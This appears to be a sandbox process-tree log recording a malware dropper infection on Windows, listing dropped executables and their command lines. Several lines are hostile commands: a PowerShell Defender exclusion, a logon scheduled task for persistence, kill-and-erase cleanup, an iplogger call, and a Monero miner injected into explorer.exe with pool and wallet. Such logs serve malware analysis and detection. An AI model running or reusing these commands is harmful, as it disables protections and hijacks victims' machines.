C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:4772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b423c06757_b31ed07.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423c06757_b31ed07.exe
629b423c06757_b31ed07.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:1284

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PG_L.cPl",
6⤵
PID:1944

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PG_L.cPl",
7⤵
- Loads dropped DLL
PID:2520

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PG_L.cPl",
8⤵
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b423cc2898_2a68ceba.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423cc2898_2a68ceba.exe
629b423cc2898_2a68ceba.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 20
6⤵
PID:316

C:\Windows\SysWOW64\timeout.exe
timeout 20
7⤵
- Delays execution with timeout.exe
PID:3120

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423cc2898_2a68ceba.exe
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423cc2898_2a68ceba.exe
6⤵
PID:2816

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423cc2898_2a68ceba.exe
C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423cc2898_2a68ceba.exe
6⤵
PID:2144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b423d8d4cc_4985f9d62b.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423d8d4cc_4985f9d62b.exe
629b423d8d4cc_4985f9d62b.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1292

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\PG_L.cPl",
5⤵
- Loads dropped DLL
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 629b423e98b72_ddc9c9a.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423e98b72_ddc9c9a.exe
629b423e98b72_ddc9c9a.exe
5⤵
- Executes dropped EXE
PID:4232

C:\Users\Admin\AppData\Local\Temp\is-UGJ8M.tmp\629b423e98b72_ddc9c9a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UGJ8M.tmp\629b423e98b72_ddc9c9a.tmp" /SL5="$60042,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS8540BF17\629b423e98b72_ddc9c9a.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3496

C:\Users\Admin\AppData\Local\Temp\is-45MAP.tmp\lBo5.exe
"C:\Users\Admin\AppData\Local\Temp\is-45MAP.tmp\lBo5.exe" /S /UID=1405
7⤵
- Executes dropped EXE
PID:1272

C:\Users\Admin\AppData\Local\Temp\b5-85e4e-5bb-e168c-424ebe287c4f7\Raekaehitegy.exe
"C:\Users\Admin\AppData\Local\Temp\b5-85e4e-5bb-e168c-424ebe287c4f7\Raekaehitegy.exe"
8⤵
PID:3088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2baa46f8,0x7ffc2baa4708,0x7ffc2baa4718
10⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1536171840546872733,1551267245345062892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
10⤵
PID:5108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1536171840546872733,1551267245345062892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
10⤵
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1536171840546872733,1551267245345062892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8
10⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\e1-d8a26-4b0-86bad-a15190e44efe6\Jexyshizhoshe.exe
"C:\Users\Admin\AppData\Local\Temp\e1-d8a26-4b0-86bad-a15190e44efe6\Jexyshizhoshe.exe"
8⤵
PID:3404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hhthz41r.xyi\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
9⤵
PID:4020

C:\Users\Admin\AppData\Local\Temp\hhthz41r.xyi\setting.exe
C:\Users\Admin\AppData\Local\Temp\hhthz41r.xyi\setting.exe SID=778 CID=778 SILENT=1 /quiet
10⤵
PID:4600

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\0182C6A\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hhthz41r.xyi\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hhthz41r.xyi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1654110019 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
11⤵
PID:5948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruzwr2qz.shl\GcleanerEU.exe /eufive & exit
9⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\ruzwr2qz.shl\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\ruzwr2qz.shl\GcleanerEU.exe /eufive
10⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 456
11⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 784
11⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 812
11⤵
- Program crash
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 832
11⤵
- Program crash
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 840
11⤵
- Program crash
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 984
11⤵
- Program crash
PID:5232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1016
11⤵
- Program crash
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1360
11⤵
- Program crash
PID:1768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ruzwr2qz.shl\GcleanerEU.exe" & exit
11⤵
PID:5908

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
12⤵
- Kills process with taskkill
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 552
11⤵
- Program crash
PID:5584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s4e4ofa5.2tu\installer.exe /qn CAMPAIGN= & exit
9⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\s4e4ofa5.2tu\installer.exe
C:\Users\Admin\AppData\Local\Temp\s4e4ofa5.2tu\installer.exe /qn CAMPAIGN=
10⤵
PID:1356

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN="" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s4e4ofa5.2tu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s4e4ofa5.2tu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1654110019 /qn CAMPAIGN= " CAMPAIGN=""
11⤵
PID:5672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcpybwsv.arc\161.exe /silent /subid=798 & exit
9⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\xcpybwsv.arc\161.exe
C:\Users\Admin\AppData\Local\Temp\xcpybwsv.arc\161.exe /silent /subid=798
10⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\is-BJQ1T.tmp\161.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BJQ1T.tmp\161.tmp" /SL5="$3022C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xcpybwsv.arc\161.exe" /silent /subid=798
11⤵
PID:5464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
12⤵
PID:5584

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
13⤵
PID:5204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
12⤵
PID:5184

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
13⤵
PID:2004

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
12⤵
PID:4676

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
12⤵
PID:6100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p125aejk.lll\gcleaner.exe /mixfive & exit
9⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\p125aejk.lll\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\p125aejk.lll\gcleaner.exe /mixfive
10⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 456
11⤵
- Program crash
PID:5604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 768
11⤵
- Program crash
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 812
11⤵
- Program crash
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 812
11⤵
- Program crash
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 768
11⤵
- Program crash
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 992
11⤵
- Program crash
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1044
11⤵
- Program crash
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1356
11⤵
- Program crash
PID:2708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\p125aejk.lll\gcleaner.exe" & exit
11⤵
PID:4872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
12⤵
- Kills process with taskkill
PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1292
11⤵
- Program crash
PID:6116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vwi0jmou.ym3\random.exe & exit
9⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\vwi0jmou.ym3\random.exe
C:\Users\Admin\AppData\Local\Temp\vwi0jmou.ym3\random.exe
10⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\vwi0jmou.ym3\random.exe
"C:\Users\Admin\AppData\Local\Temp\vwi0jmou.ym3\random.exe" help
11⤵
PID:5180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3s1zni0.dww\download.exe & exit
9⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\o3s1zni0.dww\download.exe
C:\Users\Admin\AppData\Local\Temp\o3s1zni0.dww\download.exe
10⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
11⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\K1LF850C5C4K4LM.exe
https://iplogger.org/1OAvJ
12⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\zhangwei.exe
"C:\Users\Admin\AppData\Local\Temp\zhangwei.exe"
11⤵
PID:3028

C:\Users\Admin\AppData\Local\Temp\zhangwei.exe
"C:\Users\Admin\AppData\Local\Temp\zhangwei.exe" help
12⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
"C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
11⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
11⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\is-JF13E.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JF13E.tmp\setup.tmp" /SL5="$A0120,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe"
12⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
13⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\is-8MDKE.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8MDKE.tmp\setup.tmp" /SL5="$5035E,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
14⤵
PID:5824

C:\Windows\SysWOW64\explorer.exe
explorer.exe 101
15⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\bNj4wdKWF.exe
"C:\Users\Admin\AppData\Local\Temp\bNj4wdKWF.exe"
16⤵
PID:3048

C:\Windows\SysWOW64\explorer.exe
explorer.exe
17⤵
PID:5424

C:\Users\Admin\AppData\Local\Microsoft\sysprotect.exe
C:\Users\Admin\AppData\Local\Microsoft\sysprotect.exe
18⤵
PID:5056

\Users\Admin\AppData\Local\Temp\lil.exe
19⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\AMBjyM5OL.exe
"C:\Users\Admin\AppData\Local\Temp\AMBjyM5OL.exe"
16⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\AMBjyM5OL.exe
"C:\Users\Admin\AppData\Local\Temp\AMBjyM5OL.exe"
17⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\NG07F5TV2.exe
"C:\Users\Admin\AppData\Local\Temp\NG07F5TV2.exe"
16⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\NG07F5TV2.exe
"C:\Users\Admin\AppData\Local\Temp\NG07F5TV2.exe"
17⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
"C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
11⤵
PID:5300

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5300 -s 700
12⤵
- Program crash
PID:5184

C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
11⤵
PID:3744

C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe
"C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe"
11⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
11⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
12⤵
PID:5044

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
13⤵
PID:5644

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1dc,0x1d8,0x204,0x1d4,0x7ffc3e8bdec0,0x7ffc3e8bded0,0x7ffc3e8bdee0
14⤵
PID:628

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 628 -s 464
15⤵
- Program crash
PID:5996

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2212 /prefetch:1
14⤵
PID:2904

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2152 /prefetch:1
14⤵
PID:5776

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --mojo-platform-channel-handle=2056 /prefetch:8
14⤵
PID:6124

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --mojo-platform-channel-handle=2040 /prefetch:8
14⤵
PID:3472

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
14⤵
PID:4028

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --mojo-platform-channel-handle=2404 /prefetch:8
14⤵
PID:1768

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,15582549517111131944,1656212317566208469,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5644_1589520379" --mojo-platform-channel-handle=2896 /prefetch:8
14⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe"
11⤵
PID:1776

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -Y .\Z5k8Qe.D
12⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\anytime6.exe
"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"
11⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
12⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
13⤵
PID:3760

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
14⤵
PID:6104

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:5260

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
16⤵
- Creates scheduled task(s)
PID:2884

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:440

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
16⤵
PID:5652

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
17⤵
PID:4984

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
18⤵
PID:5696

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
18⤵
PID:708

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
13⤵
PID:5872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5872 -s 2240
14⤵
- Program crash
PID:532

C:\Users\Admin\AppData\Local\Temp\anytime7.exe
"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"
11⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
12⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
13⤵
PID:4304

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
14⤵
PID:6052

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
16⤵
- Creates scheduled task(s)
PID:3668

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
15⤵
PID:3632

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
16⤵
PID:2532

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
17⤵
PID:1808

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
